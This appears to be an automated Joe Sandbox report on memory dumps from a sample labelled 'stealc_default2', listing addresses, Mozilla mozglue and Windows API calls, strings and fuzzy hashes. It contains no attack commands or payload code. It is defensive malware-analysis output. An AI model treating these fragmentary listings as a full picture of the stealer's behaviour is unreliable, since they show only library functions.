??$AddMarkerToBuffer@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AAVProfileChunkedBuffer@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6BAB64A8

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Marker$D@std@@ExclusiveLockProfileTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferBuffer@Buffer@1@Category@1@$$ChunkedCurrentD@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Init_thread_footerMarker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfilerReleaseStringThreadView@
String ID:
API String ID: 3202982786-0
Opcode ID: df67a7537973fb67be8cef15deef98e048b01032ba0f3602bb22fb75ac4e9c3b
Instruction ID: d7f845ec97d516cec0fec1fceaa1d94ca39727c9f9f345ec037cfac9c948586d
Opcode Fuzzy Hash: df67a7537973fb67be8cef15deef98e048b01032ba0f3602bb22fb75ac4e9c3b
Instruction Fuzzy Hash: 923169B18082408FDF00DF6CD18567ABBF5FB8A758F15452ED8A983341D779A885CB63

Function 6BB09B50 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6BB09B74
?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6BB09BBA
?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6BB09BC8
??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6BB09BD7
??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6BB09BE0

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
String ID:
API String ID: 2380687156-0
Opcode ID: 20f191ffadde852f1d444ec64360e9f8bc646a787a925af1b4b161d385491676
Instruction ID: 647fe097be4b8e17b93abdaa684ca203efcb996db63cd087d26268fc6b3720ad
Opcode Fuzzy Hash: 20f191ffadde852f1d444ec64360e9f8bc646a787a925af1b4b161d385491676
Instruction Fuzzy Hash: 17117072918788AB87109F788C518AFBBA8FFC6364F004A0DF99646142EF35D648C792

Function 6BAAF100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6BB1D020), ref: 6BAAF122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6BAAF132

Strings

shell32, xrefs: 6BAAF11D
SHGetKnownFolderPath, xrefs: 6BAAF12C

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: e0099e791d958bac1411c453e1c1cc7c7f979a6a6700321bc1e7eefa5ba57d07
Instruction ID: 6a5d350f913ca9fd0222233551795a2bb0b50a67551eca6343bad3cbb00fc066
Opcode Fuzzy Hash: e0099e791d958bac1411c453e1c1cc7c7f979a6a6700321bc1e7eefa5ba57d07
Instruction Fuzzy Hash: 00015E71A002199FCF149F75DD58ABB7BA8FF4A651B40041EE949D7200DB35E940CBB0

Function 6BADCBE8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,6BAA31A7), ref: 6BADCBF1
TerminateProcess.KERNEL32(00000000,00000003,?,6BAA31A7), ref: 6BADCBFA

Strings

: (malloc) Error in VirtualFree(), xrefs: 6BADD001
<jemalloc>, xrefs: 6BADCFFC

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2429186680-2186867486
Opcode ID: 862d648a2628bc90a29ced933e006843051d54de5548f437d6761835cac51961
Instruction ID: 444c096e525e320de0d153af40cbb7ea200f3fc7ffe1d92c411976fbc828d504
Opcode Fuzzy Hash: 862d648a2628bc90a29ced933e006843051d54de5548f437d6761835cac51961
Instruction Fuzzy Hash: EBB092704143089BDB242BA4980DB393B6CB709A01F04082AA20183241CFBAE1008E61

Function 6BAB2272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6BAB237F
memcpy.VCRUNTIME140(?,?,00010000), ref: 6BAB2B9C

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 0b314c4d6e05886cdc9f3b78c50911a7b5cdc03e0905d9a38f21fc6bc52da3ff
Instruction ID: e11e7f07cab2c625f7eee20b4829d685795a450657035751dfd012d4b9b1298b
Opcode Fuzzy Hash: 0b314c4d6e05886cdc9f3b78c50911a7b5cdc03e0905d9a38f21fc6bc52da3ff
Instruction Fuzzy Hash: 6DE17D71A002059FDB08CF68C990A9EBBB6BF88314F1981AEE9155B305D779ECC5CB90

Function 6BAF9120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6BAF8242,?,00000000,?,6BAEB63F), ref: 6BAF9188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6BAF8242,?,00000000,?,6BAEB63F), ref: 6BAF91BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6BAF8242,?,00000000,?,6BAEB63F), ref: 6BAF91EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6BAF8242,?,00000000,?,6BAEB63F), ref: 6BAF9200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6BAF8242,?,00000000,?,6BAEB63F), ref: 6BAF9219

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: d1c83f8d17d63b62bfe13ea4648370966edd0370704704bb1bd810dfccd73366
Instruction ID: 10999b9cabff7bbead816695ddefdd29612a14f418d4d2cd428e6053e8bf2366
Opcode Fuzzy Hash: d1c83f8d17d63b62bfe13ea4648370966edd0370704704bb1bd810dfccd73366
Instruction Fuzzy Hash: 8231E231A006058FEF10CF68DD447AA73ADEF81301F45457AE85ADB241EB35D996CBA1

Function 6BB07170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6BB07250
EnterCriticalSection.KERNEL32(6BB2F688), ref: 6BB07277
__aulldiv.LIBCMT ref: 6BB072C4
LeaveCriticalSection.KERNEL32(6BB2F688), ref: 6BB072F7

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: cfbd0abec399ac0fbcd6470f2b3cac5f335aa1e7479939f2a2dcfc6fdaa37c64
Instruction ID: 24ebe062a533a887db0e186acf22f5ad9a74d56f87230ade9572e4f44009ca99
Opcode Fuzzy Hash: cfbd0abec399ac0fbcd6470f2b3cac5f335aa1e7479939f2a2dcfc6fdaa37c64
Instruction Fuzzy Hash: 8F517F71E001698FCF09CFA9C951ABEFBB2FB89300F15862AD815A7350CB75A945CBD0

Function 6BAEE390 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAEE3E4
AcquireSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAEE3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6BAEE4AB

Part of subcall function 6BAB5D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,6BAED2DA,00000001), ref: 6BAB5D66

ReleaseSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAEE4F5
GetCurrentThreadId.KERNEL32 ref: 6BAEE577
AcquireSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAEE584
ReleaseSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAEE5DE
memset.VCRUNTIME140(?,00000000,00000000), ref: 6BAEE6DA
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BAEE864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BAEE883
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BAEE8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6BAEE826, 6BAEE850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6BAEE777
MOZ_PROFILER_STARTUP, xrefs: 6BAEE5A1, 6BAEE5CC, 6BAEE5FF, 6BAEE62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6BAEE655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6BAEE722, 6BAEE750, 6BAEE7A2

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 905598890-53385798
Opcode ID: d2226c0fc4c05ef0c1047acfd6dc6873e733643c8d84c92383fff431338ea445
Instruction ID: b0505a85e74892f3988f3ade7c3b0c19a39f565c215190a2f450acfbd7efcede
Opcode Fuzzy Hash: d2226c0fc4c05ef0c1047acfd6dc6873e733643c8d84c92383fff431338ea445
Instruction Fuzzy Hash: 9C417C74A00605DFDF14CF28C490ABAB7B1FF4A304F04416ED8669B741D77AE992CBA0

Function 6BAFDAE0 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6BAFDB86
??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6BAFDC0E
free.MOZGLUE(?), ref: 6BAFDC2E
free.MOZGLUE(?), ref: 6BAFDC40

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Impl@detail@mozilla@@Mutexfree
String ID:
API String ID: 3186548839-0
Opcode ID: 4df667ccff9720be68654e607abeef79624e0d92bf583b32c91ae6b545947209
Instruction ID: af732411aa827f272e80bc8c0e6c5a9ee7e349a07cb479185e7cef466c38fcf4
Opcode Fuzzy Hash: 4df667ccff9720be68654e607abeef79624e0d92bf583b32c91ae6b545947209
Instruction Fuzzy Hash: F2416B756007008FCB10CF34C5987ABB7F9BF88254F55886DE49A87350EB35E885CB51

Function 6BAFA2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6BAFA315
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6BAFA31F
free.MOZGLUE(00000000,?,?,?,?), ref: 6BAFA36A

Part of subcall function 6BAC5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BAC5EDB
Part of subcall function 6BAC5E90: memset.VCRUNTIME140(6BB07765,000000E5,55CCCCCC), ref: 6BAC5F27
Part of subcall function 6BAC5E90: LeaveCriticalSection.KERNEL32(?), ref: 6BAC5FB2

Part of subcall function 6BAF2140: free.MOZGLUE(?,00000060,?,6BAF7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAF215D

free.MOZGLUE(00000000), ref: 6BAFA37C

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
String ID:
API String ID: 700533648-0
Opcode ID: 20b67816f307efe4d12ec90b7f56e75760bf87db1fff6769fe60f817849250bf
Instruction ID: 9b3ac887c17de77b94e49a26fc87cf0e592373c96029e0e39357bae9785063cd
Opcode Fuzzy Hash: 20b67816f307efe4d12ec90b7f56e75760bf87db1fff6769fe60f817849250bf
Instruction Fuzzy Hash: D321CF76A002249BCF118F15C901BDFB7BEAF86754F048165F9095B300D73AE983C6D6

Function 6BAC5B50 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,6BAC56EE,?,00000001), ref: 6BAC5B85
EnterCriticalSection.KERNEL32(6BB2F688,?,?,?,6BAC56EE,?,00000001), ref: 6BAC5B90
LeaveCriticalSection.KERNEL32(6BB2F688,?,?,?,6BAC56EE,?,00000001), ref: 6BAC5BD8
GetTickCount64.KERNEL32 ref: 6BAC5BE4

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
String ID:
API String ID: 2796706680-0
Opcode ID: afad025c48c91e440c838e8e11290dc9984a9fc45a30f3c080ee83aebba6d8c4
Instruction ID: 137529ad1604ce9723d2d14da6d2148797cdfacb47bc9bff17d294d9331d5dda
Opcode Fuzzy Hash: afad025c48c91e440c838e8e11290dc9984a9fc45a30f3c080ee83aebba6d8c4
Instruction Fuzzy Hash: 9121AB756047049FCB08DF29CA5567ABBE5FB8A710F04892EE9AA87390DB31E804CB41

Function 6BAF1B80 Relevance: 6.1, APIs: 4, Instructions: 77threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAF1B98
AcquireSRWLockExclusive.KERNEL32(?,?,6BAF1D96,00000000), ref: 6BAF1BA1
ReleaseSRWLockExclusive.KERNEL32(?,?,6BAF1D96,00000000), ref: 6BAF1BB5
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAF1C25

Part of subcall function 6BAF1C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6BAF759E,?,?), ref: 6BAF1CB4

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
String ID:
API String ID: 3699359333-0
Opcode ID: abeb49997b13e6faa30fe77f8fb7301c7ce9be8d7ce08c9421e5871560dbf51e
Instruction ID: c37efb5a2a086c83ae930e4bcc9de3dc2c74fad777f6d78ba8a2ad1e61a1a699
Opcode Fuzzy Hash: abeb49997b13e6faa30fe77f8fb7301c7ce9be8d7ce08c9421e5871560dbf51e
Instruction Fuzzy Hash: 7321B0B0A002249BDF149F26C4857FFBBBCAB42744F040459F9165B241DB7EA887C791

Function 6BB07B10 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6BB07B51
__aulldiv.LIBCMT ref: 6BB07B6C
__aulldiv.LIBCMT ref: 6BB07B8B
__aulldiv.LIBCMT ref: 6BB07BB1

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction ID: c50e034f12d68ccd62859c7e08674a7d423845cfd609839229e24a86b011919b
Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction Fuzzy Hash: DD211DB1A0060A6FD714CF7DCD86E67BBE8EB85714B10857EF45ADB250E674A8408BA0

Function 6BB07A10 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6BABBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6BB07A3F), ref: 6BABBF11
Part of subcall function 6BABBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6BB07A3F), ref: 6BABBF5D
Part of subcall function 6BABBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6BB07A3F), ref: 6BABBF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6BB07A48
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6BB07A7A

Part of subcall function 6BAB9830: free.MOZGLUE(?,?,?,6BB07ABE), ref: 6BAB985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6BB07AC0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BB07AC8

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: 19e8c9ef23be965cee29d691b56e1f1d19f64691e67a1c7d81a5e5e4d60d99d5
Instruction ID: 6baa355ae6e6bfc1a90c13c9e8b16238b54afaceb3706391e918dd8258c1f2fe
Opcode Fuzzy Hash: 19e8c9ef23be965cee29d691b56e1f1d19f64691e67a1c7d81a5e5e4d60d99d5
Instruction Fuzzy Hash: 6C217F356043049FCB14DF28D899AAEFBE9FF89354F40482DE85A87351CB35E909CB92

Function 6BB07930 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6BABBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6BB07A3F), ref: 6BABBF11
Part of subcall function 6BABBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6BB07A3F), ref: 6BABBF5D
Part of subcall function 6BABBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6BB07A3F), ref: 6BABBF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6BB07968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6BB0A264,6BB0A264), ref: 6BB0799A

Part of subcall function 6BAB9830: free.MOZGLUE(?,?,?,6BB07ABE), ref: 6BAB985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6BB079E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BB079E8

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: 6013c01132654dcf433ef65160d83fe4a8ae8fa19d6fe09caa38eaeed091f650
Instruction ID: ee9024b5a3e56279c2a507083a87486f43e83793bb688950cfd95adb225fdcef
Opcode Fuzzy Hash: 6013c01132654dcf433ef65160d83fe4a8ae8fa19d6fe09caa38eaeed091f650
Instruction Fuzzy Hash: 6221A1356043049FCB14DF28D899AAEFBE9FF89310F40882DE84587351CB35E909CB92

Function 6BB0AAE0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BB0AAF8
EnterCriticalSection.KERNEL32(6BB2F770,?,6BACBF9F), ref: 6BB0AB08
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6BACBF9F), ref: 6BB0AB39
LeaveCriticalSection.KERNEL32(6BB2F770,?,?,?,?,?,?,?,?,6BACBF9F), ref: 6BB0AB6B

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

